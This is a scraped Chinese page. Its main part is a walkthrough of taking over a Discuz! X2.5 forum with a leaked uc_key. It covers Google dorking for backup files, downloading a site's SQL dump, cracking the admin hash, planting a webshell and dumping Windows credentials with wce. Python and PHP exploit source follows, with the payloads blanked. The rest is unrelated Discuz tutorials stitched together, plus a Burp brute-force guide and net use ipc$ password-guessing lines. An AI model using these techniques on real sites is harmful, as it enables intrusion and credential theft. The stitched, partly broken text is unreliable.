实战UC_Key获取Discuz!x2.5论坛Webshell
simeon
路人甲在乌云漏洞平台公布了Discuz的利用UC_KEY进行getshel的文章(https://www.doczj.com/doc/f815390276.html,/bugs/wooyun-2014-048137),随机网上公开了两套通过uc_key获取Webshell的代码,虽然最终也成功获取了Webshell,在获取Webshell过程中有一些经验值得分享。uc_key是Discuz!UC客户端与服务端通信的通信密钥,因此使用uc_key只能获取UCenter Client的webshell,即Discuiz!论坛的webshell。如果一个服务器上只有UCenter Server是不能通过uc_key来获取该服务器上的webshell的,不过可以通过uc_key来将服务器上的数据并重置用户口令,下面将如何测试网上公布的0day和实战过程进行分享。
1.测试网上公布的0day代码
通过在搜索引擎中检索“uc_key”关键词,可以方便的获取一些通过uc_key获取webshell 的文章,通过查看文章顺利获取0day代码。
1.1测试误区
下载到uc_key.php和uc_key.py代码后,首先通过程序uc_key.py进行编译执行,结果出现错误提示:“IndexError: list index out of range”。通过搜索错误提示,也没有找到解决错误的方法。后面直接执行“python uc_key.py 127.0.0.1”命令则可以顺利执行。
图1测试uc_key.py出错
1.2 uc_key.php测试
1.获取uc_key值
获取uc_key可以通过“config\config_ucenter.php”文件获取,也可以通过登录后台获取,如图2所示。单击“站长”-“Ucenter设置”,复制“Ucenter通信密钥”中的值即可。
图2获取uc_key值
2.获取webshell
对最新版本X3.1测试过程中,发现如果系统开启了防水墙会禁止危险脚本访问,如图3所示,对利用代码进行屏蔽和阻止,导致Webshell获取失败。如果数据库没有开启也会出现上面的错误提示。如果在最后的结果中出现提示“1”,如图4所示,则表示获取webshell 成功。
图3获取Webshell失败
图4获取webshell成功
对于X25系列,则可以轻松获取Webshell,执行命令“php uc_key.php”命令后,会直接
修改“config\config_ucenter.php”,如图5所示。密码为1
图5修改配置文件获取webshell
通过uc_key.php获取webshell,每次都需要修改uc_key.php中的host和uc_key值,使用起来不太方便,而通过uc_key.py则方便很多,如图6所示,通过执行python uc_key.py host uc_key值,可以直接获取webshell。
图6通过uc_key.py获取webshell
1.2实战网上获取Webshell
1.搜索敏感配置文件
在google中输入“config/config_global.php.bak”、“config/config_ucenter.php.bak”,如图7所示,对搜素结果进行分析和整理。在搜索过程中可以加入“index of”获取敏感信息。
图7google搜索敏感信息
2.查看搜索结果
在搜索结果中获取“https://www.doczj.com/doc/f815390276.html,/edusite/config”,该结果明显存在文件路径泄漏漏洞,如图8所示,单击文件链接,尝试能否获取文件的具体内容,经过测试,发现无法获取文件内容,对bak文件无法下载或者查看,直接获取uc_key值再此处行不通。
图8获取敏感文件泄漏漏洞
3.获取数据库备份文件
对该站点存在的数据库地址进行浏览和查看,如图9所示,管理员对网站数据进行过备份,单击可以直接下载。
图9下载数据库
4.破解管理员密码
下载后120903_dl8Ni1-1.sql文件后,将该数据库备份文件导入本地mysql数据库,进行查看,如图10所示,获取用户的密码等信息,对管理帐号通过cmd5网站进行破解,如图11所示,密码为“admin”,简直无语。
图10获取用户密码等信息
图11获取管理员密码
5.获取uc_key值
如图12所示,通过后台管理系统,获取uc_key通信密钥值。
图12获取uc_key值
6.获取webshell
将该值通过“php uc_key.php”或者“python uc_key.py https://www.doczj.com/doc/f815390276.html, uc_key”进行漏洞利用,成功获取webshell。如图13所示。通过webshell可以看出该网站曾经被人入侵过,入侵者留了一个大马。
图13成功获取webshell
7.获取服务器系统管理员帐号
通过webshell命令提示符,如图14所示,执行“whoami”命令得知脚本为system权限,上次wce.exe,通过“wce –w”直接获取系统管理员密码。
图14获取系统管理员账号
8. 防范与总结
Discuz!论坛在安装成功后可以通过以下一些设置加强论坛的安全:
(1)严格设置论坛目录权限,例如“D:\ComsenzEXP\wwwroot\config”设置为没有写入权限。
(2)Apache+PHP+Mysql平台授予最低权限,不要授予system权限。可以通过webshell 进行测试。
(3)备份数据库后,要及时下载并删除数据库备份文件。
(4)设置强健的管理员密码,安全验证问题和答案。
(5)关注最新Discuz!论坛漏洞和利用方法,及时更新补丁程序。
9.附件程序源代码
1.uc_key.py
#! /usr/bin/env python
#coding=utf-8
import hashlib
import time
import math
import base64
import urllib
import urllib2
import sys
def microtime(get_as_float = False) :
if get_as_float:
return time.time()
else:
return '%.8f %d' % math.modf(time.time())
def get_authcode(string, key = ''):
ckey_length = 4
key = hashlib.md5(key).hexdigest()
keya = hashlib.md5(key[0:16]).hexdigest()
keyb = hashlib.md5(key[16:32]).hexdigest()
keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:]
#keyc = (hashlib.md5('0.736000 1389448306').hexdigest())[-ckey_length:] cryptkey = keya + hashlib.md5(keya+keyc).hexdigest()
key_length = len(cryptkey)
string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string string_length = len(string)
result = ''
box = range(0, 256)
rndkey = dict()
for i in range(0,256):
rndkey[i] = ord(cryptkey[i % key_length])
j=0
for i in range(0,256):
j = (j + box[i] + rndkey[i]) % 256
tmp = box[i]
box[i] = box[j]
box[j] = tmp
a=0
j=0
for i in range(0,string_length):
a = (a + 1) % 256
j = (j + box[a]) % 256
tmp = box[a]
box[a] = box[j]
box[j] = tmp
result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256])) return keyc + base64.b64encode(result).replace('=', '')
def get_shell(url,key,host):
'''
发送命令获取webshell
'''
headers={'Accept-Language':'zh-cn',
'Content-Type':'application/x-www-form-urlencoded',
'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)', 'Referer':url
}
tm = time.time()+10*3600
tm="time=%d&action=updateapps" %tm
code = urllib.quote(get_authcode(tm,key))
url=url+"?code="+code
data1='''
'''
try:
req=urllib2.Request(url,data=data1,headers=headers)
ret=urllib2.urlopen(req)
except:
return "访问出错"
data2='''
'''
try:
req=urllib2.Request(url,data=data2,headers=headers)
ret=urllib2.urlopen(req)
except:
return "error"
return "webshell:"+host+"/config/config_ucenter.php,password:1"
if __name__ == '__main__':
host=sys.argv[1]
key=sys.argv[2]
url=host+"/api/uc.php"
print get_shell(url,key,host)
2.uc_key.php
// 代码版权归原作者所有!
$timestamp = time()+10*3600;
$host="127.0.0.1";
$uc_key="0e4b66b816fb33cf20b7686d6492xxxx8f5479fb2519895a1e7d43a52fde6f46";
$code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key));
$cmd1='
';
$cmd2='
';
$html1 = send($cmd1);
echo $html1;
$html2 = send($cmd2);
echo $html2;
function send($cmd){
global $host,$code;
$message = "POST /api/uc.php?code=".$code." HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Referer: ".$host."\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "Host: ".$host."\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
//var_dump($message);
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_length = 4;
$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == 'DECODE') {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
} else {
return $keyc.str_replace('=', '', base64_encode($result));
}
}
?>
#include DZ论坛的几个使用技巧 一.集中删除DZ论坛垃圾广告的技巧 去年曾经介绍过“一劳永逸杜绝DZ论坛垃圾广告”。有些冤家说不方便,这次要是没有设置好,根据论坛的实际情况设置好后,很管用的。 用DZ论坛系统的冤家,可能都知道,不管是设置验证码还是验证问答,都不能有效的杜绝那些烦人的垃圾广告。既然总有人在发,那我们就辛劳一点吧,删除它!假如一个一个的在论坛里面删除,比较麻烦,下面介绍一个集中删除DZ论坛垃圾广告的方法,该方法是结合我的小站金三角500万社区 第一步、设置一个新会员用户组:在用户治理里面设置新会员用户组,建议与论坛积分结合起来。答应其发新话题,但关闭回复功能,以避免用回复来发广告,增加治理的难度;并在“答应直接发帖”里面设置全部需要审核。这里需要注重,论坛里面的其它用户组,设置为不需要审核。 第二步、论坛版块设置审核新主题:在版块治理的帖子选项中设置审核新主题。假如论坛开有专门供别人发布广告的版块,则不需要设置,只设置不让发广告的版块即可。 通过以上两个步骤的设置,就可以实现集中删除DZ论坛垃圾广告了。 一般发广告的,多数使用广告机进行注册与发布,这样新注册的,就在我们设置的“新会员用户组”里面,假如新注册会员发了帖子,每次登录论坛后台,就会看到有“待审核新主题”的提示,点击它,可以看到这些帖子的列表,检查一下哪些是垃圾广告,直接删除就可以了。 由于没有通过审核的帖子,不会在论坛里面显示,就算有再多的广告帖子,也不会影响其他会员的心情,可以给其他会员比较好的“用户体验”。经过这样处理后,那些发广告的,只有白忙活了,什么也得不到! 金三角500万社区劝诫那些发垃圾广告的,醒醒吧,何必浪费大家时间! 文章来自:北京女人网 二。DZ论坛宣传和优化技巧 采用什么论坛系统、租用服务器、购买域名取名这些我还在学习中,没有人教的只能自己看看贴,所以这方面就跳过了。谈谈下面的几个点吧: 论坛主题(定位) 主题的选择是整个论坛最关键的地方。是决定网站能不能发展起来或能走多远的决定因素,也是以下所有东西的第一考量因素。 《站长》杂志第28期内容推介 十年相伴共创经典Discuz!系列经典产品回顾 站长朋友们,是否还记得Discuz! 官网那些5年前的老ID旧面孔?是否还记得曾经的Discuz! 1.0 、Discuz! 1.0 和Discuz! 5.5“长”得什么模样?在过去的十年里,senz在站长的陪伴下一路走来,推出了数款经典产品,成为社区动力,引领社区潮流发展。在即将迎来senz十周年之际,《站长》杂志特别回首过去十年来的数款经典Discuz! 产品,以及那些始终陪伴左右的站长朋友,谨以对更多陪伴Discuz! 、支持Discuz! 的站长们表示由衷的感激。 Discuz! 1.0 ——Discuz! 起点站 大C在开发Discuz! 1.0 的时候,一定不会想到之后商业化的Discuz! 1.0 、免费开源的Discuz! 4.0 、以及现在“跨界融合”的Discuz! X 系列;Discuz! 1.0 的各项功能、模板也可 能是Discuz! 系列中最简陋的,最朴素的,但没有它,也就没有后来的数个经典产品。所以,Discuz! 1.0 就像是Discuz! 系类产品的“起点站”和“加油站”一样,不断的激励着Discuz! 的后续产品一步步的改进、创新,引领社区发展潮流。 许多的草根站长,不也是这样一步步发展起来的吗?许多业已取得成功的站长,在初建社区的时候,也未曾想过能取得今天的人气与盈利,只是抱着许三多“不抛弃、不放弃”的信念从小做大,根据市场需求逐步改进自己的产品,一步步走向了成功。这种“从小到大”、“坚持不放弃”、“以市场为导向”的理念不仅是说Discuz! 1.0 ,也同样适用于社区。 Discuz! 2.0 ——商业化 相信有不少人热衷于基于修改原有系统文件所做的插件,当然了解程序文件功能是最重要的,下面我把Discuz! X2.0主要的程序文件功能说一下。我只是整理,不是自己原创编辑的,所有权归原创作者所有哦。 Tips: Q:针对说明的文件是? A:我只基于原版文件对upload目录中基本的程序文件(php,htm,js,除了极少数无关紧要的)进行解释,其余文件(如图片文件),一般不做说明 Q:某些目录下空白的index.htm是用来做什么的? A:用来防止列目录的 Q:文件名颜色和标识的意义是? A:粗体表示这个文件比较重要,除非你非常了解其功能,否则修改错误会导致全站瘫痪;斜体表示这个文件已被加密,一般情况下修改没有意义;下划线表示这个文件一般99.99%的修改是用不上的,了解即可 绿色的是函数库文件,蓝色的是常量调用文件,红色的是系统全局核心文件 Q:文件名命名有什么特别规律吗? A:有的,一般inc的是调用文件,func是函数库文件,class是库文件,lng的是语言包文件,了解这些后缀能快速掌握文件功能。 Q:我看了你的帖子,可是我还是看不懂文件内是什么意思啊? A:这个嘛,还是要有一定基础了,一般掌握SQL,PHP和Htm你就可以去改文件做你要的功能了,这个不是我的任务了哦。一般来说,如果随便指个地方,你能在1分钟内说出大概位置及所在的文件,那么你基本就算合格了。不过我个人认为最重要的还是多改多读,在实践中提高自己的能力 下面开始了,请看你的upload目录里面的文件,表述的格式依次为文件名,功能描述等等 先从根目录开始,根目录文件一般都是入口,即执行具体功能的代码一般不在这些文件中,而是在其调用的文件中 admin.php 系统站点管理入口文件 api.php Discuz!合作应用入口文件(例如漫游、支付宝什么的都走这里) connect.php QQ互联入口文件 cp.php 应用入口文件 crossdomain.xml 数据交互文件,如果在里面定义其它站点的地址,那么这两个不同站点就可以交互数据 favicon.ico图标文件,显示在浏览器的标题栏 forum.php 论坛入口文件 group.php 群组入口文件 DISCUZ论坛代码大全 1.[ u]文字:在文字的位置可以任意加入您需要的字符,显示为下划线效果。 2.[ align=center]文字:在文字的位置可以任意加入您需要的字符,center位置center表示居中,left表示居左,right表示居右。 5.[ color=red]文字:输入您的颜色代码,在标签的中间插入文字可以实现文字颜色改变。 6.[ SIZE=数字]文字:输入您的字体大小,在标签的中间插入文字可以实现文字大小改变。 7.[ font=隶书]改变字体 8.[ FLY]飞翔的文字[/FLY]:在标签的中间插入文字可以实现文字飞翔效果,类似跑马灯。 9.[ MOVE]移动的文字[/MOVE]:在标签的中间插入文字可以实现文字移动效果,来回飘动。 10.[FLIPH左右颠倒文字/FLIPH] 11.[FLIPV]上下颠倒文字[/FLIPV] 12.[GLOW=255,red,2]文字[/GLOW]:在标签的中间插入文字可以实现文字发光特效,glow 内属性依次为宽度、颜色和边界大小。 13.[BLUR=文字宽度,方向,浓度]模糊文字[/BLUR] 14.[SHADOW=255,red,2]文字[/SHADOW]:在标签的中间插入文字可以实现文字阴影特效,shadow内属性依次为宽度、颜色和边界大小。 15.[ url=https://www.doczj.com/doc/f815390276.html,/]https://www.doczj.com/doc/f815390276.html,/[/url] [ url=https://www.doczj.com/doc/f815390276.html,/]康盛创想[/url]:有两种方法可以加入超级连接,可以连接具体地址或者文字连接。本文由过期域名抢注https://www.doczj.com/doc/f815390276.html,域名抢注整理 16.[ img]图片地址[/img] :在标签的中间插入图片地址可以实现插图效果。 17.[ email]给我发email[/email] 发email给我 18.[ wmv=360,65,1]视频、mp3文件的链接地址[/wmv] 这是论坛最常使用的插入视频或者mp3文件的格式。360,65,1是播放器窗口的宽和高,可自行设定大小。 19.[ FLASH=宽度,高度]Flash连接地址[/FLASH] 手动控制 20.[ swf]Flash连接地址[/swf] 自动控制大小 在标签的中间插入Flash图片地址可以实现插入Flash。 Discuz教程 插件制作的基本思路是:(初学者适用) 1.形成插件思路 2.制作插件界面 3.构架程序模块 4.搭建存储数据 5.填充功能语句 6.检查应用错误 7.完善插件功能 前言:为方便互联网数万Discuz!爱好者,更加深入了解Discuz!软件,本人在熟悉Discuz!过程中,顺便将个人经验写给大家。本贴内容由本人定期更新。本贴只介绍Discuz!中部分技术点,本贴紧属个人观点,不足之处,请各位多多指教,在下先此谢过!。“Discuz!”在下文中简称“DZ”。要弄DZ二次开发,必须至少具备如下技能:1)能够理很好理解MVC构架的原理(虽然DZ不是MVC架构的) 2)扎实的PHP基础,熟悉结构化程序,OOP程序的写法及应用 3)熟悉MYSQL就用,掌握SQL语言,懂SQL优化者更佳 4)熟悉使用Discuz!的各项功能 一)Discuz!的文件系统目录 注:想搞DZ开发,就得弄懂DZ中每个文件的功能。 a) Admin:后台管理功能模块 b) Api:DZ系统与其它系统之间接口程序 c) Archiver:DZ中,用以搜索引擎优化的无图版 d) Attachments:DZ中,用户上传附件的存放目录 e) Customavatars:DZ中,用户自定义头像的目录 f) Forumdata:DZ缓存数据的存放目录 g) Images:DZ模板中的图片存放目录 h) Include:DZ常用函数库,基本功能模块目录 i) Ipdata:DZ统计IP来路用的数据 j) Plugins:DZ插件信息的存放目录 k) Templates:DZ模板文件的存放目录 l) Wap:DZ无线,Wap程序处理目录 二)必须记熟Discuz!数据库设计的每个表的功能,每个表中每个字段的功能。 关于DZ数据库设计文档,请参阅DZ相关的项目文档(请从本贴附件中下载) 三)Discuz!的流程控制 a) 后台流程控:DZ后台所有的功能,均需要注册到admincp.php文件,每个功能都至少有一个或一个以上的Action(动作),在admincp.php中,可以定义Action的执行权限,分别为:“admin==1”管理员,或“admin==2 || admin==3”超级版主和版主,每个Action对应一个脚本文件,脚本文件的命名为action.inc.php(*.inc.php),并存放在admin目录下,如执行:admincp.php?action=dodo,相当于执行admin目录下的dodo.inc.php文件 b) 前台流程控制:前台的流程控制比较简单:流程是自由的,如: 首页:index.php 会员注册:register.php; 会员登录:logging.php 发贴程序:post.php 会员信息:member.php 论坛内容:forumdisplay.php 查看贴子:member.php …大部分功能,此处不一一列出… c) DZ根目下的config.inc.php属于整个DZ系统的配置文件 四)Discuz!的数据处理过程 a) DZ对mysql的数据库操作处理全部封装在dbstuff(db_mysql.class.php)类中 b) 所在的外部数据均通过“daddslashes()”初步过滤,然后再过滤,再根据需要处理 五)Discuz!的显示控制(网站多样式风格输出) a) 显示层就是大家通常所看到的网站风格了。DZ中每套风络分别在templates及images下对应一个风格文件的存放目录。网站风格的制作,请参阅详细的DZ风格制作文档 b) DZ网站风格文件处理的原理:其实很简单,DZ使用template.func.php中的parse_template()以PHP正则运算把htm模文件中的模板标签,转换成了PHP代码,并根据styleid保存在forumdata/templates下,这个有点像Smarty 中的技术。 六)DZ中的语言处理 a) DZ前台及后台中、英语言的实现,均是把语句定义成了语变量,然后在模板输入,语句变量的赋值,均放在模板目录中的*.lang.php文件中,DZ在生成网站风格时就加载了这相应的语言包。 七)DZ如何处理用户信息(存取、计算、更新过程) Burp Suite--- Intruder小技巧 作者:小冰50421961[AT] QQ [Dot] com 0x00 题外话 最近朋友送了我少女时代日本巡回演唱会蓝光高清限量版,太激动了!为此表示感谢,所以才有了下文。O(∩_∩)O哈哈~废话不多说,进入正题。 0x01 Intruder—暴力破解 安装要求: Java环境下载地址: https://www.doczj.com/doc/f815390276.html,/j2se/downloads.html Burp Suite下载地址: https://www.doczj.com/doc/f815390276.html,/burp/download.html 入门: 安装完成后可以双击可执行的JAR文件,如果不工作,你可以运行在命令提示符或终端输入。命令: Java –jar burpsuite_v1.4.jar 上篇文章对于burp的基本设置,已经说了很明了了,在这我就只提下就行咯。(*^__^*) 嘻嘻…… 配置过程如下: 代理端口配置如下图: 浏览器的配置如下图: 然后把拦截(intercept)功能关闭,因为我们这里不需要进行数据拦截 目标:登陆页面 思路过程:寻找登陆错误关键字—进行暴力破解 打开我们的目标如下图: 我们随意填写账户密码进行登陆,以此获取到登陆的错误信息如下图: 然后返回burp看提交和返回数据信息如下图: 发现我们浏览器所爆出的错误信息在数据包返回的页面中根本无法找到。我想这应该是要pro 版本 才能查看到数据吧 O(∩_∩)O 哈哈~ 开个玩笑!其实细心的童鞋会发现我上图我所标注的地方,HTTP 状态码302—重定向到另外一个url,我们看看第二个url 返回的内容如下图: Discuz数据表详解方便二次开发 Discuz数据表详解,方便二次开发,有时候还是感觉直接改动数据库比较方便一些 Discuz默认库的53个数据表 cdb_access (用户权限表) uid 用户id fid 论坛id allowview 允许浏览 allowpost 允许发新帖 allowreply 允许回复 allowgetattach 允许下载附件 allowpostattach 允许上传附件 cdb_adminactions 关联用户组 admingid 管理组id disabledactions 关联后的权限 cdb_admingroups 管理组权限设置(3条)admingid 管理组id alloweditpost 允许编辑帖子 alloweditpoll 允许编辑投票 allowstickthread 允许固定主题 allowmodpost 允许编辑帖子 allowdelpost 允许删除帖子 allowmassprune 允许批量删除帖子 allowrefund 允许强制退款 allowcensorword 允许过滤词语 allowviewip 允许查看用户IP信息 allowbanip 允许禁止IP allowedituser 允许编辑用户 allowmoduser 允许审核用户 allowbanuser 允许禁止用户访问 allowpostannounce 允许发布公告 allowviewlog 允许查看版主管理记录和用户评分记录 disablepostctrl 发贴不受***(不受灌水预防和最大字数等) cdb_adminnotes (后台留言表) id 后台留言id admin 留言人 access 阅读权限 adminid 管理组id dateline 发表时间 expiration 过期时间 message 留言内容 #include"stdio.h" #include"time.h" #include"stdlib.h" #include"malloc.h" #include"string.h" int main() { char a[10],b[]={"000000"},c[]={"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU VWXYZ"}; int d[6]; clock_t start,finish; double TheTimes; do { printf("请输入六位密码:"); gets(a); if(a[6]=='\0') { break; } printf("ERROR\n" ); } while(1); start=clock(); while(1) { for(d[5]=0;d[5]<64;d[5]++) { b[5]=c[d[5]]; for(d[4]=0;d[4]<64;d[4]++) { b[4]=c[d[4]]; for(d[3]=0;d[3]<64;d[3]++) { b[3]=c[d[3]]; for(d[2]=0;d[2]<64;d[2]++) { b[2]=c[d[2]]; for(d[1]=0;d[1]<64;d[1]++) { b[1]=c[d[1]]; for(d[0]=0;d[0]<64;d[0]++) { b[0]=c[d[0]]; if(strcmp(a,b)==0) { printf("破解密码得:"); puts(b); finish=clock(); TheTimes=(double)((finish-start)/CLOCKS_PER_SEC); printf("用时%f秒。\n",TheTimes); return(0); } } } } } } } } return(0); } Discuz!道具系统采用独立的php文件的道具结构,每个道具拥有一个单独的php文件,做为这个道具运行文件,用户可以自行编写道具文件制作属于自己论坛的道具。下面具体介绍一下相关机制和开发方法 1、道具的组成 每个道具由两部分组成,php文件和图片文件。 php文件存放在论坛include/magic目录下,命名规范为magic_inc_道具名称.php文件。图片文件存放在images/magics目录下,命名规范为道具唯一标识(小写).gif 注:其中道具名称由任意英文字母组成,道具唯一标识是在添加的时候确定的,此标识唯一,最长为3个大写英文字母 道具图片不用多说就是gif文件,下面我具体说说php文件编写规范 2、道具php文件编写详解 我们以一个道具php文件(magic_inc_close.php)为例 1. D i s c u z论坛……………………… 安装说明文档 北京XXX二合开甲X号XXX宿舍 2009年9月 目录 一、目录 (3) 二、MySQL数据库的安装 (4) 三、Apache网页服务的安装 (6) 四、libxml的安装 (7) 五、PHP编译语言的安装 (7) 六、Discuz论坛文件的权限设置 (8) 一、目录 开始写这篇技术文档之前,我已经为了Discuz论坛忙了一个星期,最开始安装、排错、再安装、再排错,一直到后来的安装成功,费了不少的脑细胞。在此期间,我要鸣谢网上的一篇“Redhat Linux AS4下的LAMP与Discuz安装”的文章,而我写的内容也是再它的基础上上详细了一点,所以也说不上是原创,还要感谢宿舍的一位兄弟,若没有他的强大技术做后盾,恐怕也就没有今天的文章。OK.说道正题。论坛搭建在RedHat 9的系统之上,主要的几个软件如下。 (1)mysql-5.0.67 版本 ----MySQL数据库 (2)httpd-2.2.9版本 ----Apache安装文件 (3)php-5.2.6 ----PHP包文件 (4)upload Discuz 7.0.0版本 ----论坛安装文件 (5)libxml2-2.6.11 -----libxml包 以上五个文件是最主要的,其中包的版本只可高不可低,安装的系统可以是linux的其他版本,具体的步骤也是大同小异,废话不说,开装。 二、MySQL数据库的安装 1:useradd mysql (首先建立MYSQL用户,为创建MYSQL数据库做铺垫) 2:tar -zxvf mysql-5.0.67.tar.gz -C /use/local/src(把MySQLTAR包解压到SRC目录里面。这里面的-C指定的解压目录,如果不写上会解压到当前目录里面) 3:cd /usr/local/src/mysql-5.0.67/ (进入到解压后的目录) 4:./configure --prefix=/usr/local/mysql --with-charset='gbk' (指定安装目录到/USR/LOCAL/MYSQL,进行编译前的准备。然后添加GBK模块,在安装Discuz!的时候会出现gbk错误,加上--with-charset='gbk'就可以) 5:make (编译) make install (执行安装命令) 6:cp support-files/https://www.doczj.com/doc/f815390276.html,f /etc/https://www.doczj.com/doc/f815390276.html,f (拷贝MYSQL的配置文件)7:cd /usr/local/mysql/bin (进入MYSQL的BIN目录下) 8:./mysql_install_db --user=mysql (使用MYSQL用户执行MYSQL脚本)9:chown -R mysql. (改变BIN目录所有者为MYSQL) 10:chown -R mysql var (改变VAR目录所有者为mysql,在这里需要进入/usr/local/mysql) 11:bin/mysqld_safe --user=mysql & (用MySQL启动数据库) 12:ps -ef | grep mysql (检查MYSQL是否已经启动) 13:vi /etc/rc.d/rc.local →进入自动启动目录,添加 /etc/init.d/mysql start,以后开机后会自动启动。 14:vi ~/.bashrc →→→export PATH=“$PATH:/usr/local/mysql/bin“(添加MySQL家目录的环境变量。在这里的路径是家目录,需要注销一下,Exit命令) 15:cp /usr/local/mysql/share/mysql/mysql.server /etc/init.d/mysql (复制mysql服务启动项文件) 16:chmod +x /etc/rc.d/init.d/mysql (给MySQL启动脚本加执行权限) Discuz文件目录及文件功能总结 先从根目录开始,根目录文件一般都是入口,即执行具体功能的代码一般不在这些文件中,而是在其调用的文件中 ◆admin.php 后台管理入口文件 ◆api.php Discuz!合作应用入口文件(例如漫游、支付宝等) ◆connect.php QQ互联入口文件 ◆cp.php应用入口文件 ◆crossdomain.xml 数据交互文件,如果在里面定义其它站点的地 址,那么这两个不同站点就可以交互数据 ◆favicon.ico 图标文件,显示在浏览器的标题栏 ◆forum.php 论坛入口文件 ◆group.php 群组入口文件 ◆home.php 家园入口文件 ◆index.php 门户入口文件,功能与portal.php基本相同 ◆member.php 用户信息入口文件 ◆misc.php 网站用户常用操作入口文件,例如像评分、收藏等功能 都是走这个文件的 ◆plugin.php 插件入口文件 ◆portal.php 门户入口文件 ◆robots.txt 在这个文件中加上具体的地址,可以防止被搜索蜘蛛检 索到 ◆search.php 搜索功能入口程序 ◆userapp.php 用户应用入口程序 API目录中的文件主要是和Discuz!进行合作的商家的应用程序,一般不要也无需修改 ●api ┄┄┄外部接口 ?addons ?connect ┄┄┄腾讯互联 connect.php ┄┄┄ like.php ┄┄┄ server.php ┄┄┄ ?db ┄┄┄UCenter数据库备份接口 ?google ┄┄┄Google引擎使用 ?javascript ┄┄┄数据和广告的 JS调用 ?manyou ┄┄┄manyou应用及搜索等相关服务 Discuz地区设置 站长或者管理员可以自己编辑地区数据、根据所在地区的不同,增加、删除和修改地区名称等。可以用于会员个人资料中的出生地、居住地等处,有了这些地区信息,会员不需要自己手动填写,只要选择就可以了非常方便、快捷。 注意:添加,编辑或删除操作后需要点击“提交”按钮才生效。 设置好以后会员填写个人资料等的时候,效果如下图所示: 我们可以在后台对地区进行设置,增加地区、删除以及修改。 操作路径:后台=>全局=>地区设置 设置方法如下: 一、添加地区 直接在地区设置下方输入要添加的地区名,点击添加,然后点提交即可,如下图所示: 如果要在州县下面添加地区,可以选择好省份和城市后再添加,如下图所示: 如上图所示,可以在北京市崇文区下添加所属街道。 点击添加即可填写要添加的地区名,提交即可添加成功。 二、编辑地区 直接修改地区名称然后点击提交即可修改成功。 三、删除地区 直接点击地区名称右侧的删除即可把该名称直接删除。 四、开启和关闭地区 可以在地区设置的首页进行选择,分别有出生地和居住地的开户和关闭选择,打勾即可开启该项,反之则关闭该项,关闭后会员将无法选择该地区。 五、地区在站点中的应用 会员可以在站点的个人资料中进行出生地和居住地的选择。 Discuz! X2 伪静态设置 伪静态的文件,这个是服务器插件。。如果您不是服务器的话,一般叫IDC说,我要DZ的伪静态,地球人都在用,你这咋不用??? 1、下载伪静态文件,然后, 1、将下载的 IIS Rewrite 组件解压,放到任意盘上的任意目录(如 C:Rewrite 下) 2、在 IIS 管理器里选择网站,右键选择“属性”,如下图所示: 一、软件准备。 在进行论坛搭建之前,首先要准备好一些软件,以便进行文件的上传和安装。主要需要以下几个文件: 1.discuz安装包。下载地址:https://www.doczj.com/doc/f815390276.html,/downloads/install/discuz 由于我们是在中国大陆。所以这里为了方便,我们选择使用discuz 7.0 完整版进行安装:https://www.doczj.com/doc/f815390276.html,/Discuz/7.0.0/Discuz_7.0.0_FULL_SC_GBK.zip 这里简要说明一下,FULL版的安装包已经集成了Ucenter,无需再次安装。下载完成后解压。 2.FlashFXP。下载地址: https://www.doczj.com/doc/f815390276.html,/myfile/syxf/dpin/qyd1ti55nygm1dv2003/1218098677/b59ffe3c05b7 a0af0e429f34228def6b/HA-FlashFXP3_SC.exe 这个软件用于将sicuz安装包里的文件上传至虚拟主机。 二、虚拟主机准备。 搭建论坛首先需要一个“仓库”来储存数据,这里我们选择申请虚拟主机来作为这样一个平台。 1.注册会员。 登录到https://www.doczj.com/doc/f815390276.html,,会员登录->注册(按钮),如图所示 填写相关信息,这里的信息一定要记住,这个账号将用于申请虚拟主机。 进入下一步之后将会提示完善信息,按照提示输入即可。 2.申请虚拟主机。 登陆刚才注册的账号,然后选择下图中任意一个主机,点击立即订购。 出现下面的界面,注意按照提示操作。 完成之后按照提示进入购物车,结算并确认订单,此时,虚拟主机就申请好了。 三、开通MYSQL数据库。 建立好虚拟主机之后,我们需要在虚拟主机上创建一个数据库,用于存放数据。具体做法如下。 返回网站首页。https://www.doczj.com/doc/f815390276.html,/store/index.php 点击,进入会员中心 选择“我的MySQL”,出现以下画面,操作见图。 原理: 1、字典:for /f %i in (字典文件) do net use 主机ipc$ "%i" /user:"用户" 2、数字:for /l %i in (start,step,end) do net use 